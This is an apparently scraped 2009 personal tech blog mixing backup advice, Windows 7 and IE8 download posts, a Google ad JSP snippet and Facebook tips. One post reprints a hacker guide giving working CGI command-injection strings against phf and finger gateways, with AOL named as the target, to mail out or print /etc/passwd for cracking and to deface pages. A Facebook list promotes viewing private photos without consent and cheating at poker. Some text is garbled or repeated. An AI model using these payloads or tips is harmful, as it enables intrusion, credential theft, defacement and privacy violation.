Friday, November 27, 2009

Backing Up Your Files

As hard drives can be unreliable in some cases it is important to make sure that you have backups of all your important documents. Backing up a hard drive isn't something that many people do but it is in fact extremely important. In this article are big a through how you can make sure that you backup all the critical files on your hard drive so that if something goes wrong you are the least have a backup of these.

In essence a backup is using a different kind of format to store your files so that they aren't all in one place. There is no point backing up your files onto the same drive as they were originally stored so you need to find some other way of backing up. For example you could backup using a floppy disk although these can't hold that much data compared to the amount that people use today.

A better option is to use CDs or DVDs. You can back up a large amount of data on a CD especially if you're just backing up Word documents. Of course a DVD is much bigger than a CD and you will be able to store more data on that. DVDs are more expensive though. It straightforward to write data to a CD and most computers come with a rewritable drive.

If you have a lot of data to backup then you will be best served by getting an external hard drive. These can come up in sizes anywhere up to hundreds of gigabytes and hence will have enough room to store even videos and music. These are perfect if you want to backup your entire hard drive but a bit too much if you just want to store your most important document somewhere safe.

If you'd like to learn more about data recovery and hard drive restoration then please follow the links.

Article Source: http://EzineArticles.com/?expert=James_Poulton

Thursday, November 19, 2009

Download Windows 7 Beta Free

Windows 7 is the next release of the Windows client operating system, built on the secure foundation of Windows Vista and Windows Server 2008.

Hardware Recommendations:
Processor: 1 GHz 32-bit or 64-bit processor
Memory: 1 GB of system memory
Hard drive: 16 GB of available disk space
Video card: Support for DirectX 9 graphics with 128MB memory (in order to enable Aero theme)
Drive: DVD-R/W drive
Internet connection (to download the Beta and get updates)

Windows 7 Beta Frequently Asked Questions: http://www.microsoft.com/windows/windows-7/beta-faq.aspx

Download: http://technet.microsoft.com/en-gb/evalcenter/dd353205.aspx

How to Rename the Recycle Bin

To change the name of the Recycle Bin desktop icon, open Regedit and go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

and change the name "Recycle Bin" to whatever you want (don't type any quotes).

Download Internet Explorer 8

Internet Explorer 8 is the latest version of the familiar web browser you are most comfortable using, helping you get everything you want from the web faster, easier, more privately and securely than ever before.

Faster:
Internet Explorer 8 is more responsive with new pages and tabs, opening up fast and reliably. You can now get to the information you care about most, in fewer steps; one click access to your webmail, favorite news sites or other online services.
Easier:
Reduce the steps to accomplish many common tasks, and automate your access to real time information updates. You can keep track of your favorite sports team, news, weather with a single click.
More Private:
Helps protect your privacy and confidential information where ever you go on the web.
More Secure:
Helps protect and stop malicious software from reaching your PC, and makes it easier to detect when a website is an imposter.

* Download Internet Explorer 8 for Windows XP

* Download Internet Explorer 8 for Windows Vista

Wednesday, November 11, 2009

Search the profile/people using their Email Address

Ever wanted to know more about the person you are chatting with? Beware, internet is not being safe now a days. You must know the background of that person before being familiar with them. You must never share your personal information to them. Not only to them, but also to the web site forms.

Never fill up the form randomly without knowing about the website. If you want your email address to be private then you must be aware about sharing your personal information like your home address, telephone number, etc.

Why? Because, not only Google but everyone is watching you. Google is the best method to search everything about your email address and username. But If you really want to know about ther person's email address then I have a good website for you.
I am talking about, Pipl.com

Tuesday, November 10, 2009

Hacking from your Web Browser

************************************************************************

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.

II - Hacking from your Web Browser

There are several techniques on what I call "Web Browser Hacking". Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hacking:
Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://

www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box. b. The common cgi-bin/phf query: This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type ... Http://www.aol.com/cgi-bin/phf ... if the phf is operational and has not been rem oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x:). c. Dont take my cgi form: This section will explain how to use somebody else's cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify






This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.

system("/usr/lib/sendmail -t $myaddress < $tempfile") Now lets set up your page:

Hack AOL





The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.

d. Changing web pages from your browser:
This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section.... http://www.aol.com.... we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%2

0>>filename.html...... This string will allow you to write to the filename.html and add "some text and shit" be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser... It may also inform the guru's and advanced hackers some bits of information of perl and cgi. In further reading check out my sec

ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting...... wake up!!! thus I conclude.....

Modify.

IV - Suggested Reading

Phrack Magazine: Very informative.... covers just about everything from phreaking to hacking.... Just download all the damn articles.

Building Internet Firewalls by O'Reilly & Associates, Inc. aka "The Big Wooden Door"": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.
************************************************************************
www.technophoria.com

Monday, November 9, 2009

google ads

<%@ page import="java.io.BufferedReader, java.io.InputStreamReader, java.io.IOException, java.io.UnsupportedEncodingException, java.net.URL, java.net.URLEncoder, java.util.ArrayList, java.util.List" %>
<%! private static final String PAGEAD = "http://pagead2.googlesyndication.com/pagead/ads?"; private void googleAppendUrl(StringBuilder url, String param, String value) throws UnsupportedEncodingException { if (value != null) { String encodedValue = URLEncoder.encode(value, "UTF-8"); url.append("&").append(param).append("=").append(encodedValue); } } private void googleAppendColor(StringBuilder url, String param, String value, long random) { String[] colorArray = value.split(","); url.append("&").append(param).append("=").append( colorArray[(int)(random % colorArray.length)]); } private void googleAppendScreenRes(StringBuilder url, String uaPixels, String xUpDevcapScreenpixels, String xJphoneDisplay) { String screenRes = uaPixels; if (screenRes == null) { screenRes = xUpDevcapScreenpixels; } if (screenRes == null) { screenRes = xJphoneDisplay; } if (screenRes != null) { String[] resArray = screenRes.split("[x,*]"); if (resArray.length == 2) { url.append("&u_w=").append(resArray[0]); url.append("&u_h=").append(resArray[1]); } } } private void googleAppendMuid(StringBuilder url, List muids) {
for (String muid : muids) {
if (muid != null) {
url.append("&muid=").append(muid);
}
}
}

private void googleAppendViaAndAccept(StringBuilder url, String via,
String accept) throws UnsupportedEncodingException {
googleAppendUrl(url, "via", via);
googleAppendUrl(url, "accept", accept);
}

%>
<% long googleDt = System.currentTimeMillis(); StringBuilder googleAdUrlStr = new StringBuilder(PAGEAD); googleAdUrlStr.append("ad_type=text_image"); googleAdUrlStr.append("&channel=2935517920"); googleAdUrlStr.append("&client=ca-mb-pub-7501430161072384"); googleAdUrlStr.append("&dt=").append(googleDt); googleAdUrlStr.append("&format=mobile_single"); googleAppendUrl(googleAdUrlStr, "ip", request.getRemoteAddr()); googleAdUrlStr.append("&markup=xhtml"); googleAdUrlStr.append("&oe=utf8"); googleAdUrlStr.append("&output=xhtml"); googleAppendUrl(googleAdUrlStr, "ref", request.getHeader("Referer")); String googleUrl = request.getRequestURL().toString(); if (request.getQueryString() != null) { googleUrl += "?" + request.getQueryString().toString(); } googleAppendUrl(googleAdUrlStr, "url", googleUrl); String googleUserAgent = request.getHeader("User-Agent"); googleAppendUrl(googleAdUrlStr, "useragent", googleUserAgent); googleAppendScreenRes(googleAdUrlStr, request.getHeader("UA-pixels"), request.getHeader("x-up-devcap-screenpixels"), request.getHeader("x-jphone-display")); List googleMuids = new ArrayList();
googleMuids.add(request.getHeader("X-DCMGUID"));
googleMuids.add(request.getHeader("X-UP-SUBNO"));
googleMuids.add(request.getHeader("X-JPHONE_UID"));
googleMuids.add(request.getHeader("X-EM-UID"));
googleAppendMuid(googleAdUrlStr, googleMuids);
if (googleUserAgent == null || googleUserAgent.length() == 0) {
googleAppendViaAndAccept(googleAdUrlStr, request.getHeader("Via"),
request.getHeader("Accept"));
}
try {
URL googleAdUrl = new URL(googleAdUrlStr.toString());
BufferedReader reader = new BufferedReader(
new InputStreamReader(googleAdUrl.openStream(), "UTF-8"));
for (String line; (line = reader.readLine()) != null;) {
out.println(line);
}
} catch (IOException e) {}

%>

Serch Engine

Top 10 Facebook Hacks

Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.


1.How to View the Album of Any User Even if it is Private
You can use this script to view a photo in the original album, even if you’re not friends with the person.


2. How to Remove Annoying Facebook Advertisement
Get rid of some of the Facebook advertising and sponsored by sections with this tool.


3. How to see Real Profiles from Public Pages
This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.


4. How to Undo Facebook Changes
If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.


5. How to View All the Photos from a Person
You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.


6. How to Find More Friends at Facebook
Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.


7. How to Share Files from Facebook
With this box widget, you can share files from your computer through Facebook. Isn’t it great?


8. How to Get a Job from Facebook
Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.


9. How to Tighten up the Privacy and still Maintain Communication Convenience
The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.


10 How to Cheat Facebook Texas Hold em Poker
This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

Free settings for reliance India mobile internet

On the repeated request of the users for the free settings of mobile internet by the reliance India users, I am posting this to solve their problem. I hope this works as I have not tested this free reliance mobile internet setting due to time constraints.

Reliance India however launched the mobile internet as an introductory offer and charges a mere 10p per 10kb of the network you use. To access the mobile internet you need to select the RMW option and under that option select more services and then finally mobile internet. For the convenience of the users reliance has tagged the application available on the network with only two symbols where “U” indicates that you will need to pay for the application if want to use it and the symbol “>” indicates that this service carries no content in it.

Before putting the settings specified below you need to ensure two things. Firstly that you have carefully plugged in your phone to the pc via an usb cable or via Bluetooth. Secondly you need to have the phone modem drivers properly installed so that your pc can recognize your phone as a modem.
On the repeated request of the users for the free settings of mobile internet by the reliance India users, I am posting this to solve their problem. I hope this works as I have not tested this free reliance mobile internet setting due to time constraints.

Reliance India however launched the mobile internet as an introductory offer and charges a mere 10p per 10kb of the network you use. To access the mobile internet you need to select the RMW option and under that option select more services and then finally mobile internet. For the convenience of the users reliance has tagged the application available on the network with only two symbols where “U” indicates that you will need to pay for the application if want to use it and the symbol “>” indicates that this service carries no content in it.

Free settings for reliance India mobile internet

Before putting the settings specified below you need to ensure two things. Firstly that you have carefully plugged in your phone to the pc via an usb cable or via Bluetooth. Secondly you need to have the phone modem drivers properly installed so that your pc can recognize your phone as a modem.

Sunday, November 8, 2009

Monday, November 2, 2009

Thursday, July 30, 2009

intro

hi,
i am baaacccckkkk